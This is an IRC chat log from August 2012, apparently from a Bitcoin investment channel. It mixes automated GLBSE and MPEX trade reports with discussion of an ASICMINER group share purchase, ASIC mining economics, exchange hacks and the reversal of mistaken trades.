[GLBSE] [NASTY] 95 @ 0.55 = 52.25 BTC [+] Aug 11 18:44:40 [GLBSE] [NASTY] 38 @ 0.6 = 22.8 BTC [+] Aug 11 18:45:12 [GLBSE] [YABMC] 9 @ 0.1199 = 1.0791 BTC [-] Aug 11 18:45:20 [GLBSE] [ASICMINER] 1 @ 0.1 BTC Aug 11 18:48:07 [GLBSE] [CIUCIU.BOND] 4 @ 0.1 = 0.4 BTC Aug 11 18:54:06 [GLBSE] [NYAN.B] 1 @ 1.07 BTC [+] Aug 11 18:54:08 [GLBSE] [NYAN.B] 2 @ 1.08 = 2.16 BTC [+] Aug 11 18:55:38 [GLBSE] [NYAN] 3 @ 1.03 = 3.09 BTC [+] Aug 11 18:58:25 [GLBSE] [TYGRR.BOND-D] 1 @ 1 BTC [-] Aug 11 19:13:50 [GLBSE] [BDT] 1 @ 1.0599 BTC [-] Aug 11 19:16:46 [GLBSE] [BIB.PIRATE] 44 @ 1 = 44 BTC [-] Aug 11 19:16:48 [GLBSE] [YABMC] 1 @ 0.1199 BTC [-] Aug 11 19:16:50 [GLBSE] [YABMC] 8 @ 0.12 = 0.96 BTC [+] Aug 11 19:26:06 [MPEX] [S.MPOE] 17691 @ 0.00034558 = 6.1137 BTC [+] Aug 11 19:26:07 [MPEX] [S.MPOE] 13709 @ 0.0003458 = 4.7406 BTC [+] Aug 11 19:32:28 [MPEX] [S.MPOE] 26800 @ 0.0003458 = 9.2674 BTC [+] Aug 11 19:35:09 [GLBSE] [ASICMINER] 10 @ 0.1 = 1 BTC Aug 11 19:39:38 [GLBSE] [ASICMINER] 7 @ 0.1 = 0.7 BTC Aug 11 19:41:27 Anyone wanna buy YARR?:p Aug 11 19:41:55 [GLBSE] [TYGRR.BOND-B] 2 @ 0.1 = 0.2 BTC [+] Aug 11 19:42:11 Goat? :p Aug 11 19:43:25 Let's make a deal :) Aug 11 19:47:23 [GLBSE] [YARR] 2 @ 1.551 = 3.102 BTC [-] Aug 11 19:47:24 [GLBSE] [YARR] 3 @ 1.55 = 4.65 BTC [-] Aug 11 19:47:26 [GLBSE] [YARR] 2 @ 1.51 = 3.02 BTC [-] Aug 11 19:47:26 [GLBSE] [YARR] 4 @ 1.50600011 = 6.024 BTC [-] Aug 11 19:47:27 [GLBSE] [YARR] 123 @ 1.506 = 185.238 BTC [-] Aug 11 19:47:28 [GLBSE] [YARR] 2 @ 1.5 = 3 BTC [-] Aug 11 19:47:30 [GLBSE] [YARR] 10 @ 1.5 = 15 BTC [-] Aug 11 19:51:06 [GLBSE] [BIF.BTCST.PPT] 21 @ 1.026 = 21.546 BTC [+] Aug 11 19:53:29 [GLBSE] [BIB.PIRATE] 59 @ 1 = 59 BTC [-] Aug 11 19:54:39 DeaDTerra: still looking for ASICMINER group buy? Aug 11 19:56:35 [GLBSE] [BMF] 50 @ 0.7 = 35 BTC [+] Aug 11 19:59:22 he's at work IIANM Aug 11 19:59:56 he will be here in 2-3 hrs ? Aug 11 20:00:38 [MPEX] [F.GIGA.ETF] 3619 @ 0.001135 = 4.1076 BTC [+] Aug 11 20:02:03 ASICMINER group buy?? Aug 11 20:07:44 [GLBSE] [MOORE] 2 @ 0.5148 = 1.0296 BTC [+] Aug 11 20:10:17 [GLBSE] [BIF.BTCST.PPT] 9 @ 1.03 = 9.27 BTC [+] Aug 11 20:15:56 from what i can tell its done Aug 11 20:16:03 im waitng on my shares as we speak Aug 11 20:16:23 When DT gets online he will probably xfer them Aug 11 20:16:46 Oh hey BTC, any news on the interview? Aug 11 20:17:05 There's a lot to chew through there, have you looked at it yet? Aug 11 20:18:23 arf, I was forgetting about it Aug 11 20:32:57 [GLBSE] [OBSI.1MHS] 2 @ 0.1 = 0.2 BTC [+] Aug 11 20:36:26 please resend any messages sent within 10 min Aug 11 20:41:25 [MPEX] [S.MPOE] 12823 @ 0.0003458 = 4.4342 BTC [+] Aug 11 20:41:26 [MPEX] [S.MPOE] 1777 @ 0.00034655 = 0.6158 BTC [+] Aug 11 20:43:23 [GLBSE] [BITCOINRS] 1 @ 0.05 BTC [+] Aug 11 20:43:25 [GLBSE] [YABMC] 15 @ 0.10343 = 1.5515 BTC [-] Aug 11 20:43:26 [GLBSE] [YABMC] 22 @ 0.10333 = 2.2733 BTC [-] Aug 11 20:43:27 [GLBSE] [YABMC] 5 @ 0.103 = 0.515 BTC [-] Aug 11 20:43:29 [GLBSE] [YABMC] 2 @ 0.1023001 = 0.2046 BTC [-] Aug 11 20:43:29 [GLBSE] [YABMC] 4 @ 0.102 = 0.408 BTC [-] Aug 11 20:43:30 [GLBSE] [YABMC] 5 @ 0.101 = 0.505 BTC [-] Aug 11 20:43:31 [GLBSE] [YABMC] 4 @ 0.10000001 = 0.4 BTC [-] Aug 11 20:43:32 [GLBSE] [YABMC] 1 @ 0.1 BTC [-] Aug 11 20:43:33 [GLBSE] [YABMC] 30 @ 0.1 = 3 BTC [-] Aug 11 20:44:46 [GLBSE] [PPT.B] 100 @ 1.08 = 108 BTC [+] Aug 11 20:44:48 [GLBSE] [PPT.B] 25 @ 1.08 = 27 BTC [+] Aug 11 20:57:02 [GLBSE] [ASICMINER] 20 @ 0.1 = 2 BTC Aug 11 21:04:11 [MPEX] [F.GIGA.ETF] 3100 @ 0.00112372 = 3.4835 BTC [-] Aug 11 21:38:51 [GLBSE] [BITBOND] 6 @ 0.3951 = 2.3706 BTC [+] Aug 11 21:40:20 [GLBSE] [GIGAMINING] 4 @ 1.1201 = 4.4804 BTC [-] Aug 11 21:40:21 [GLBSE] [GIGAMINING] 10 @ 1.12 = 11.2 BTC [-] Aug 11 21:41:14 [GLBSE] [PPT.B] 10 @ 1.08 = 10.8 BTC [+] Aug 11 21:41:57 [GLBSE] [OBSI.HRPT] 16 @ 0.1075 = 1.72 BTC [+] Aug 11 21:42:21 [GLBSE] [OBSI.HRPT] 178 @ 0.10777 = 19.1831 BTC [+] Aug 11 21:42:48 [GLBSE] [OBSI.HRPT] 1 @ 0.10789 BTC [+] Aug 11 21:42:50 [GLBSE] [OBSI.HRPT] 79 @ 0.10789 = 8.5233 BTC [+] Aug 11 21:43:06 [GLBSE] [OBSI.HRPT] 1 @ 0.10789 BTC [+] Aug 11 21:44:09 [GLBSE] [OBSI.HRPT] 238 @ 0.1079 = 25.6802 BTC [+] Aug 11 21:44:54 [GLBSE] [OBSI.HRPT] 50 @ 0.108 = 5.4 BTC [+] Aug 11 21:46:02 [GLBSE] [OBSI.HRPT] 36 @ 0.1098 = 3.9528 BTC [+] Aug 11 21:47:36 [MPEX] [O.HASH.P10TH] 80000 @ 0.01671251 = 1337.0008 BTC [-] Aug 11 21:52:07 [MPEX] [F.GIGA.ETF] 13900 @ 0.00112372 = 15.6197 BTC [-] Aug 11 21:52:08 [MPEX] [F.GIGA.ETF] 126 @ 0.00110748 = 0.1395 BTC [-] Aug 11 21:52:10 [MPEX] [F.GIGA.ETF] 700 @ 0.00110604 = 0.7742 BTC [-] Aug 11 21:52:11 [MPEX] [F.GIGA.ETF] 4032 @ 0.00109738 = 4.4246 BTC [-] Aug 11 21:52:12 [MPEX] [F.GIGA.ETF] 6800 @ 0.0010967 = 7.4576 BTC [-] Aug 11 21:52:13 [MPEX] [F.GIGA.ETF] 11661 @ 0.00109474 = 12.7658 BTC [-] Aug 11 21:52:13 [MPEX] [F.GIGA.ETF] 12781 @ 0.001091 = 13.9441 BTC [-] Aug 11 22:02:57 [GLBSE] [FPGAMINING] 3 @ 0.84 = 2.52 BTC [-] Aug 11 22:02:58 [GLBSE] [FPGAMINING] 740 @ 0.844 = 624.56 BTC [+] Aug 11 22:06:48 [GLBSE] [BITBOND] 1 @ 0.3741 BTC [-] Aug 11 22:09:32 [GLBSE] [BITBOND] 1 @ 0.39722099 BTC [+] Aug 11 22:10:01 [GLBSE] [FPGAMINING] 160 @ 0.845 = 135.2 BTC [+] Aug 11 22:13:38 [GLBSE] [YABMC] 7 @ 0.1189 = 0.8323 BTC [+] Aug 11 22:13:53 [GLBSE] [FOO.PPPPT] 13 @ 1.04 = 13.52 BTC [+] Aug 11 22:14:15 [GLBSE] [YABMC] 1 @ 0.1189 BTC [+] Aug 11 22:14:17 [GLBSE] [CPA] 10 @ 0.10296 = 1.0296 BTC [+] Aug 11 22:18:25 hey guys ! sup? Aug 11 22:18:40 not much. Aug 11 22:20:10 DeaDTerraMobil: you still looking for ASICMINING group buyers? Aug 11 22:20:34 what's group buyers ? Aug 11 22:20:55 you get a discount for large buy, he was bringing together small buys into one large one Aug 11 22:21:36 o for the bfl thing Aug 11 22:21:46 you get extra shares actually but he was selling shares for 0.09 I think Aug 11 22:21:51 not bfl Aug 11 22:21:59 different ASIC devel company Aug 11 22:22:25 ASICMINER my mistake Aug 11 22:22:27 [GLBSE] [ASICMINER] 10 @ 0.1 = 1 BTC Aug 11 22:22:31 https://bitcointalk.org/index.php?topic=99497.0 Aug 11 22:22:51 yes I am Aug 11 22:23:02 wait what ?! /me goes reads up Aug 11 22:23:10 ok, I'll take 1,111 Aug 11 22:23:26 though the purchase will be done tomorrow so contact me tomorrow morning at latest Aug 11 22:24:15 whenever is convenient for you, do you take BTC direct or through GLBSE? Aug 11 22:24:33 I am not at home aatm please contact me again in 20min when I have access to my spreadsheets xD Aug 11 22:24:41 doesn't matter Aug 11 22:24:43 will do, thanks Aug 11 22:25:47 same for anyone else that wants to join in :-) help support a bfls competitor Aug 11 22:26:20 DeaDTerraMobil can you give me a short version of what's this about ? Aug 11 22:27:23 they are making their own ASICs in china for october or nov delivery and will mine for themselves before selling to us. Share buyers get a cut of mining profits & help bring ASIC competitor to market Aug 11 22:27:52 aha Aug 11 22:29:52 I can once I am not on a smartphone makes it hard to type anything longer then a sentence Aug 11 22:30:15 thanks obsi :-) Aug 11 22:30:40 it's run by friedcat Aug 11 22:31:03 and two Chinese hardware designers/manufacturer Aug 11 22:32:00 DeaDTerraMobil what's your relation to friedcat ? seems it's a mu thing ? Aug 11 22:32:18 RAH! Aug 11 22:32:54 I have worked a bit with him in thwarted past giving him my feedback about and such Aug 11 22:32:55 BTC-Mining i think you're mining for bitcoins wrongly. mining != log in log out irc :D Aug 11 22:33:24 so basically you're an assign ? or just came up with the plan to pool people on your own ? Aug 11 22:33:38 he gave nefario early access to the info for this project so I could give feedback on it Aug 11 22:34:25 on my own. I like the project and I want it to succeed hence I do my best to raise capital Aug 11 22:34:52 but I am not hired or anything like that. Just a dedicated investor Aug 11 22:35:17 me * not nefario xD Aug 11 22:35:26 damn auto correct Aug 11 22:35:28 what do you think their chances are of mining by November? Aug 11 22:36:14 high they Have the design already complete and a professional cpu designer on the team Aug 11 22:36:59 they need the capital for further optimization and production Aug 11 22:37:23 they have managed to reach 2-4$ per ghash Aug 11 22:37:26 so far Aug 11 22:37:27 the more companies with ASIC miners available the better Aug 11 22:37:45 if only we could buy at such prices :) Aug 11 22:38:00 [MPEX] [S.MPOE] 9825 @ 0.000335 = 3.2914 BTC [-] Aug 11 22:38:29 does friedcat even have an irc handle ? Aug 11 22:38:49 [GLBSE] [BDK.BND] 1 @ 0.102746 BTC [-] Aug 11 22:41:11 not sure I cab ask him on Skype when I get home Aug 11 22:41:33 4 min then I am home xD Aug 11 22:41:41 DeaDTerraMobil that'd be great, mind asking him to drop me a line here ? Aug 11 22:41:49 [GLBSE] [ASICMINER] 45 @ 0.1 = 4.5 BTC Aug 11 22:42:01 currently walking home front the train station Aug 11 22:42:42 sure not sure if he's online. what's the time in China ? Aug 11 22:43:06 3:43 am Aug 11 22:43:21 sounds perfect :D Aug 11 22:44:11 [GLBSE] [ZETA-MINING] 1 @ 0.165 BTC [-] Aug 11 22:44:12 [GLBSE] [ZETA-MINING] 1 @ 0.162 BTC [-] Aug 11 22:44:13 [GLBSE] [ZETA-MINING] 4 @ 0.162 = 0.648 BTC [-] Aug 11 22:49:37 [GLBSE] [PUREMINING] 9 @ 0.15429999 = 1.3887 BTC [+] Aug 11 22:49:38 [GLBSE] [PUREMINING] 1 @ 0.15439999 BTC [+] Aug 11 22:52:25 I am home now :) Aug 11 22:53:06 anyone that wanted to get in on the ASICMINER action please pm me Aug 11 22:56:55 [GLBSE] [NASTY] 40 @ 0.6 = 24 BTC [+] Aug 11 22:57:19 [GLBSE] [NASTY] 1 @ 0.6 BTC [+] Aug 11 22:57:31 [GLBSE] [TYGRR.BOND-PI] 1 @ 1.62 BTC [-] Aug 11 22:59:16 [GLBSE] [ASICMINER] 10 @ 0.1 = 1 BTC Aug 11 23:00:35 [MPEX] [O.BTCUSD.P110T] 4 @ 0.13132043 = 0.5253 BTC [-] Aug 11 23:02:09 [GLBSE] [HYDRO.BONDS] 5 @ 1.55 = 7.75 BTC [-] Aug 11 23:06:22 [GLBSE] [OBSI.HRPT] 2 @ 0.1098 = 0.2196 BTC [+] Aug 11 23:06:32 [GLBSE] [FOO.PPPPT] 3 @ 1.04 = 3.12 BTC [+] Aug 11 23:13:08 [MPEX] [F.GIGA.ETF] 300 @ 0.001091 = 0.3273 BTC [-] Aug 11 23:17:54 [MPEX] [F.GIGA.ETF] 7200 @ 0.00111568 = 8.0329 BTC [+] Aug 11 23:20:29 howdy Aug 11 23:20:35 any daily drama i missed' Aug 11 23:22:01 [GLBSE] [TYGRR.BOND-PI] 10 @ 1.62 = 16.2 BTC [-] Aug 11 23:22:03 21:37.24 ( DeaDTerraMobil ) they have managed to reach 2-4$ per ghash Aug 11 23:22:15 [14:28:29] bitfury.org: I even think that $1 for 1 Gh/s is overassumption if done in volumes. Aug 11 23:22:15 [14:28:42] bitfury.org: I expect for 45nm and careful custom design at about $0.2 - $0.3 for 1 Ghs Aug 11 23:23:51 Hash Rate: 1GH/s Aug 11 23:23:51 Area: 18.9 mm^2 Aug 11 23:23:52 Power Consumption: 4.9 W Aug 11 23:24:03 current specifics, and they are not yet fully optimized Aug 11 23:24:15 that power consumption is chip only, or whole device? Aug 11 23:24:19 [GLBSE] [BIF.BTCST.PPT] 2 @ 1.03 = 2.06 BTC [+] Aug 11 23:24:33 [GLBSE] [ASICMINER] 30 @ 0.1 = 3 BTC Aug 11 23:24:36 for the 18.9mm2 i would guess Aug 11 23:24:39 We are. We started our design in late June. We managed to pushe the hashrate of each chip from 180MH/s to 1GH/s within July. Aug 11 23:24:39 [2012-08-09 15:07:54] Anthony: and the peak margin cost of each chip is? Aug 11 23:24:39 [2012-08-09 15:08:27] 蒋信予: 0.8$, with logistics, still less than 1$. Aug 11 23:24:45 http://blockchain.info/tx-index/7573083/4ca2f3687f2c978d7eede875daf499808651ea737232c8abfe4e1cfb7e5f5502 Aug 11 23:24:52 somebody made 1k btc off that dice site. Aug 11 23:24:57 The chip Aug 11 23:26:39 anyone knows who runs satoshi dice ? Aug 11 23:27:10 i had a talk about asic today with fury Aug 11 23:27:23 evoorhees at one point wasn't it? Aug 11 23:27:47 and he is not too excited over frieds solution Aug 11 23:28:06 [GLBSE] [ASICMINER] 80 @ 0.1 = 8 BTC Aug 11 23:29:15 [GLBSE] [YABMC] 2 @ 0.1189 = 0.2378 BTC [+] Aug 11 23:29:19 kakobrekla whyssay ? Aug 11 23:29:27 [GLBSE] [HYDRO.BONDS] 2 @ 1.55 = 3.1 BTC [-] Aug 11 23:29:51 I know a guy that works for Satoshi dice not sure if he owns it though Aug 11 23:29:55 [GLBSE] [GIGAMINING] 1 @ 1.1201 BTC [+] Aug 11 23:30:03 DeaDTerra whossat ? Aug 11 23:30:20 Eric voorhees Aug 11 23:30:33 aha. ty. Aug 11 23:30:41 [GLBSE] [OBSI.HRPT] 3 @ 0.1031 = 0.3093 BTC [-] Aug 11 23:30:41 Why so kako? Aug 11 23:30:42 [GLBSE] [OBSI.HRPT] 177 @ 0.1011 = 17.8947 BTC [-] Aug 11 23:31:39 http://www.forbes.com/sites/jonmatonis/2012/08/11/my-answer-to-a-vcs-bitcoin-question/ Aug 11 23:31:41 this is pretty good. Aug 11 23:31:54 [GLBSE] [PPT.DIV] 1 @ 0.581 BTC [+] Aug 11 23:33:16 [GLBSE] [BIB.PIRATE] 1 @ 1.02249988 BTC [+] Aug 11 23:33:17 [GLBSE] [BIB.PIRATE] 7 @ 1.02474998 = 7.1732 BTC [+] Aug 11 23:33:19 [GLBSE] [BIB.PIRATE] 70 @ 1.025 = 71.75 BTC [+] Aug 11 23:33:19 [GLBSE] [BIB.PIRATE] 6 @ 1.03 = 6.18 BTC [+] Aug 11 23:34:52 [GLBSE] [CIUCIU.MINING] 50 @ 0.1 = 5 BTC Aug 11 23:35:15 well, its complicated and im not sure if i am allowed to discuss it in public Aug 11 23:35:36 ill just say i have been on the line with him for some time now Aug 11 23:36:09 and have the most respect for the man, i do belive he can beat the rest of the competition, but not by being the first on the market Aug 11 23:36:17 but that in not that important with asic anyway Aug 11 23:36:29 [GLBSE] [TYGRR.BOND-P] 1 @ 1.0399 BTC [+] Aug 11 23:36:51 [GLBSE] [TYGRR.BOND-P] 1 @ 1.04 BTC [+] Aug 11 23:37:59 that;'s not too illuminating. Aug 11 23:38:54 well Aug 11 23:38:58 true that Aug 11 23:39:09 most of the stuff is so technical even i barley understand Aug 11 23:39:18 but here is a clue: DRC Aug 11 23:39:26 :p Aug 11 23:39:57 what does the Democratic Republic of the Congo have to do with this? Aug 11 23:39:58 the democratic republic of congo ? Aug 11 23:39:59 o i c. Aug 11 23:39:59 :P Aug 11 23:40:01 ahaha Aug 11 23:40:16 told you it was technical. Aug 11 23:40:17 he prolly means design rule checking Aug 11 23:40:18 :p Aug 11 23:40:32 or drc tech company Aug 11 23:41:09 [GLBSE] [FOO.PPPPT] 1 @ 1.04 BTC [+] Aug 11 23:42:11 the thing is... what kind of differences will his optimizations bring? Will they outweigh the profits of being a buyer of the first ASIC to market? Aug 11 23:42:58 >true "end-game" performance would be magnitude cheaper than BFL's offer. Aug 11 23:43:44 that is certainly true. Aug 11 23:44:17 true end game performance also will require ~2-3 years of r&d and about 100mn - a few bn in fixed costs. Aug 11 23:44:26 that is not happening in 2013 Aug 11 23:44:30 mostly because sony are idiots. Aug 11 23:46:04 btw Aug 11 23:46:15 also imho there is something wrong with current mining profitablitly Aug 11 23:46:22 its too high. Aug 11 23:46:52 i can identify several factors causing this Aug 11 23:47:20 its going down lol. Aug 11 23:47:29 orly? Aug 11 23:47:29 http://smpake.com/etc/btc/charts.php Aug 11 23:48:20 its 0.45eur / 100mhash / day Aug 11 23:48:26 too high Aug 11 23:49:31 low enough so you can probably never get your investment back (if you buy a GPU to mine) Aug 11 23:50:20 it wont hold Aug 11 23:50:36 or the price wil pop hard or the diff will be driven even higher Aug 11 23:50:45 to lessen profitablitly Aug 11 23:50:46 [GLBSE] [TYGRR.BOND-P] 1 @ 1.04 BTC [+] Aug 11 23:50:46 hmm... is there email notices when you receive a message in your GLBSE inbox? Aug 11 23:50:47 ;;bc,stats Aug 11 23:50:49 Current Blocks: 193432 | Current Difficulty: 2036671.0886933 | Next Difficulty At Block: 193535 | Next Difficulty In: 103 blocks | Next Difficulty In About: 15 hours, 40 minutes, and 44 seconds | Next Difficulty Estimate: 2183270.15599682 | Estimated Percent Change: 7.197974583 Aug 11 23:50:54 +7% Aug 11 23:50:57 ok not too bad Aug 11 23:51:18 was hoping for +10 Aug 11 23:51:27 kakobrekla i meant in the future, it is going down, not in the continous Aug 11 23:51:36 [MPEX] [S.MPOE] 15332 @ 0.000335 = 5.1362 BTC [-] Aug 11 23:51:39 yes Aug 11 23:51:43 it should be going down Aug 11 23:51:44 all the time Aug 11 23:51:55 well no, it'll stagnate some periods, drop some other periods. Aug 11 23:52:00 take into account the price wnet up 2x Aug 11 23:52:09 the fact it's "the same" in usd hides a little story. Aug 11 23:52:23 yeah but its cheaper and cheaper to run hashing machines Aug 11 23:52:41 for some reason the total hash output is notreflectign this yet Aug 11 23:52:44 cpu -> gpu -> fpga -> now upcoming asic Aug 11 23:52:57 mostly because the nutso forum community is living on images, and images are asic companies expectations Aug 11 23:53:04 not that many asics are actually online yet. Aug 11 23:53:26 prolly zero Aug 11 23:53:33 and the asics offered are really closer to fpgas than real asics. Aug 11 23:53:43 I thought ArtForz claimed to have asics last year? Aug 11 23:53:46 but in general, profitablity should be going down constantly Aug 11 23:53:50 there's no ASICs online as far as we know... Aug 11 23:53:56 Obsi those are mostly prototype units Aug 11 23:54:14 Well no real ASICs... Aug 11 23:54:33 i never heard of a profitable foundry run under a few million units. Aug 11 23:54:40 i dunno why you'd call 10k runs an asic, but anyway. Aug 11 23:54:41 I've seen some single accounts throw around 250+ Ghash on the pools Aug 11 23:55:16 could as well be gpumax? Aug 11 23:55:25 could be Aug 11 23:55:39 anyway, kakobrekla : look at the daily 100mhash revenue Aug 11 23:55:51 was 4.5 usd in may, is .5ish now Aug 11 23:56:41 you will see a correction Aug 11 23:56:48 soon Aug 11 23:57:35 im sure i will. Aug 11 23:57:48 it will be reflected by one or combo of the following: btc price drop, diff rise, reward halving Aug 11 23:58:49 i am really curious to see if btc price drops Aug 11 23:59:08 seeing how my book is really very heavily loaded on short calls / long puts Aug 12 00:00:51 hm Aug 12 00:01:18 well im quite certian we wont see 5$ again in 2012 Aug 12 00:01:20 [GLBSE] [FPGAMINING] 906 @ 0.846 = 766.476 BTC [+] Aug 12 00:03:04 i doubt it too, esp with the reward halving Aug 12 00:03:17 but you neverk now. yet another mtgox hack. one large player deciding to quit Aug 12 00:03:24 large scam popping wide open. etc. Aug 12 00:03:26 many contingencies. Aug 12 00:03:35 us govt declaring bitcoin a schedule A drug Aug 12 00:03:49 :DD Aug 12 00:04:50 so wait... we have to buy BTC on SR with BTC if that happens? Aug 12 00:04:58 :D Aug 12 00:05:47 [GLBSE] [FPGAMINING] 3 @ 0.8499 = 2.5497 BTC [+] Aug 12 00:06:15 exactly :D Aug 12 00:06:49 [GLBSE] [OBSI.1MHS] 30 @ 0.1 = 3 BTC [+] Aug 12 00:07:19 [GLBSE] [JTME] 3 @ 0.9998 = 2.9994 BTC [+] Aug 12 00:09:01 [GLBSE] [FOO.PPPPT] 1 @ 1.04 BTC [+] Aug 12 00:09:37 [MPEX] [S.BVPS] 350 @ 0.00282246 = 0.9879 BTC [+] Aug 12 00:09:38 [MPEX] [S.BVPS] 221 @ 0.00300496 = 0.6641 BTC [+] Aug 12 00:09:40 [MPEX] [S.BVPS] 500 @ 0.0033919 = 1.696 BTC [+] Aug 12 00:10:13 [GLBSE] [BIB.PIRATE] 1 @ 1.02999998 BTC [-] Aug 12 00:10:31 anyone checking metheor shower? Aug 12 00:10:54 https://www.youtube.com/watch?v=106ne66KAuw Aug 12 00:27:09 [GLBSE] [HYDRO.BONDS] 5 @ 1.55 = 7.75 BTC [-] Aug 12 00:29:48 hey, I bought DMC Aug 12 00:29:56 awesome. Aug 12 00:30:17 with my 0.00000001 bid Aug 12 00:31:57 lol Aug 12 00:32:55 how did that happen Aug 12 00:33:26 [GLBSE] [OBSI.HRPT] 1 @ 0.109 BTC [+] Aug 12 00:34:25 or, more to the point, why Aug 12 00:35:20 hacked acc? Aug 12 00:36:07 [GLBSE] [GIGAMINING] 1 @ 1.1298 BTC [+] Aug 12 00:36:09 [GLBSE] [GIGAMINING] 6 @ 1.12998 = 6.7799 BTC [+] Aug 12 00:36:10 [GLBSE] [GIGAMINING] 3 @ 1.13 = 3.39 BTC [+] Aug 12 00:36:36 scary with the number of hacks in the bitcoin world Aug 12 00:36:53 not really Aug 12 00:37:23 why not? Aug 12 00:37:28 there are far more hapening on much bigger scale elsewhere Aug 12 00:37:51 yes, but in that world you have insurance and such Aug 12 00:38:06 ...and yes, I know about CPA Aug 12 00:38:10 also, consider amount of hacks / total size of economy Aug 12 00:39:07 surely BTC wins under that metric Aug 12 00:39:29 I doubt it Aug 12 00:39:40 you mean all other economies put together? That's hardly fair Aug 12 00:39:47 when blizzard gets its database stolen I expect it costs them quite a lot Aug 12 00:40:28 Blizzard probably gets it back in free publicity Aug 12 00:41:04 ubisoft could be looking at some serious loss for backdooring all of their customers Aug 12 00:42:03 linkedin's security spend probably jumped exponentially Aug 12 00:42:24 I don't keep anything of value online anyway.. Aug 12 00:42:35 bitcoins (and glbse assets) are the exception Aug 12 00:42:45 thus I'm more worried about hacks in this "world" Aug 12 00:43:47 the differences with bitcoin are that its an easy target to gain monetary value directly, there are a lot of stupid children implementing bitcoin services and a lot more people willing to blindly invest in them Aug 12 00:44:00 Also, it's keeping me from investing bigger amounts. Now, I'm only buying what I'd be able to get over by cursing for half a minute or so. Aug 12 00:45:18 Hackers (crackers) being anti-authoritarian should be supporting bitcoin. Show some solidarity to the project. Aug 12 00:46:18 solidarity Aug 12 00:46:22 thats so naive. Aug 12 00:46:54 Yeah, well I'm Norwegian Aug 12 00:47:10 Used to leaving the front door open etc. Aug 12 00:47:17 (I meant unlocked) Aug 12 00:47:33 was going to ask if it gets cold inside as a result Aug 12 00:47:54 very cold Aug 12 00:47:56 brendio: you around? Aug 12 00:48:04 [GLBSE] [IBB] 5 @ 0.64 = 3.2 BTC Aug 12 00:48:17 what kind of name is kakobrekla anyway? Aug 12 00:48:47 a strange kind Aug 12 00:48:53 :) Aug 12 00:49:25 rumanian / finnish or something? Aug 12 00:49:53 hi bitfoo Aug 12 00:50:05 heya Aug 12 00:50:13 how's the funding situation looking? Aug 12 00:50:17 [GLBSE] [BIB.PIRATE] 1 @ 1.02999996 BTC [-] Aug 12 00:50:18 [GLBSE] [BIB.PIRATE] 4 @ 1.03 = 4.12 BTC [+] Aug 12 00:50:20 [GLBSE] [BIB.PIRATE] 10 @ 1.035 = 10.35 BTC [+] Aug 12 00:50:40 I'm at 7% even with the new levels Aug 12 00:50:56 good to know! Aug 12 00:51:01 I increased my own personal exposure a bit temporarily Aug 12 00:51:04 ah Aug 12 00:51:17 I was going to offer some if you needed more Aug 12 00:51:22 I just need to manage redemptions etc now Aug 12 00:52:17 Did you want to invest some more or only to help me out? Aug 12 00:52:23 no, just to help Aug 12 00:52:24 [GLBSE] [007] 2 @ 0.1818 = 0.3636 BTC [-] Aug 12 00:52:25 [GLBSE] [007] 3 @ 0.1789 = 0.5367 BTC [-] Aug 12 00:52:33 didn't want any more exposure to pirate Aug 12 00:52:36 MoneyIsDebt, its how a female would say: (more directly) "how should i say" / (less directly) "how should i put it" in a certian slovenian dialect Aug 12 00:52:52 okay, no worries Aug 12 00:53:32 because dropping to 6% could cause an irrecoverable bank run Aug 12 00:53:49 slovenian... cool :) Aug 12 00:53:54 [GLBSE] [IBB] 5 @ 0.64 = 3.2 BTC Aug 12 00:54:23 kakobrekla: How would a male say: "where should i put it" in the same dialect? Aug 12 00:54:34 kakobreku Aug 12 00:54:39 :) Aug 12 00:54:44 lol Aug 12 00:54:48 useful to know Aug 12 00:55:07 [GLBSE] [NASTY] 6 @ 0.6 = 3.6 BTC [+] Aug 12 00:57:01 also Aug 12 00:57:10 its not 'where' as you typed but 'how' Aug 12 00:57:16 as looking to find apropriate words Aug 12 00:57:23 to express oneself Aug 12 00:57:40 right' Aug 12 01:00:06 [GLBSE] [BITBOND] 1 @ 0.39968999 BTC [+] Aug 12 01:03:09 [GLBSE] [FPGAMINING] 874 @ 0.8499 = 742.8126 BTC [+] Aug 12 01:13:44 [GLBSE] [ASICMINER] 2 @ 0.1 = 0.2 BTC Aug 12 01:14:25 [GLBSE] [OBSI.HRPT] 18 @ 0.10898 = 1.9616 BTC [-] Aug 12 01:28:31 [GLBSE] [BIF.BTCST.PPT] 1 @ 1.03 BTC [+] Aug 12 01:29:41 [GLBSE] [OBSI.1MHS] 5 @ 0.1 = 0.5 BTC [+] Aug 12 01:37:49 [GLBSE] [ASICMINER] 3 @ 0.1 = 0.3 BTC Aug 12 01:38:03 [GLBSE] [OBSI.HRPT] 1 @ 0.102 BTC [-] Aug 12 01:38:04 [GLBSE] [OBSI.HRPT] 5 @ 0.10111 = 0.5056 BTC [-] Aug 12 01:38:06 [GLBSE] [OBSI.HRPT] 85 @ 0.10111 = 8.5944 BTC [-] Aug 12 01:38:07 [GLBSE] [OBSI.HRPT] 100 @ 0.10111 = 10.111 BTC [-] Aug 12 01:38:08 [GLBSE] [OBSI.HRPT] 309 @ 0.1011 = 31.2399 BTC [-] Aug 12 01:48:50 [GLBSE] [GIGAMINING] 1 @ 1.1201 BTC [-] Aug 12 01:50:35 [GLBSE] [BMMO] 1 @ 0.081001 BTC [+] Aug 12 01:51:08 any else want to bulk order ASICMINER and get the shares for 0.09 BTC? Aug 12 01:51:17 last call the bulk will be traded tomorrow Aug 12 01:53:04 meh... Aug 12 01:53:16 [GLBSE] [OBSI.HRPT] 1 @ 0.10896 BTC [+] Aug 12 01:53:25 When are their asics planned? Aug 12 01:55:00 [GLBSE] [FZB.A] 1 @ 0.03 BTC [-] Aug 12 01:55:10 Also, public poll: Who here thinks transactions on GLBSE made in error should not be reversed? Aug 12 01:56:01 what kind of "error" are we talking here? Aug 12 01:56:38 I lost money selling shares at .12 instead of 1.12 (made for a nice loss). Most people recommended to request a reversal. I however think such transactions should not be reversable and I didn't request it. Aug 12 01:57:33 [GLBSE] [BITBOND] 1 @ 0.370001 BTC [-] Aug 12 01:57:58 sounds like you did the right thing Aug 12 01:58:48 Yes, just like stock exchange, I think transactions should not be reversable (barring hacking/stolen funds) Aug 12 01:59:49 I however would like to see a setting allowing to set a % over/under market price at which it triggers a confirmation screen to pop. It would be as simple as a lightweight javascript checking the 7 day average and comparing if it's x% over or under your current setting. Aug 12 02:00:10 I would be a lot richer man today if I could go back and reverse all those fat-finger, bad big figure, or typo trades I've done. those can be expensive mistakes. Aug 12 02:00:26 I lost 52 BTC eheh Aug 12 02:00:40 [MPEX] [S.MPOE] 23300 @ 0.00034514 = 8.0418 BTC [+] Aug 12 02:00:42 [MPEX] [S.MPOE] 1900 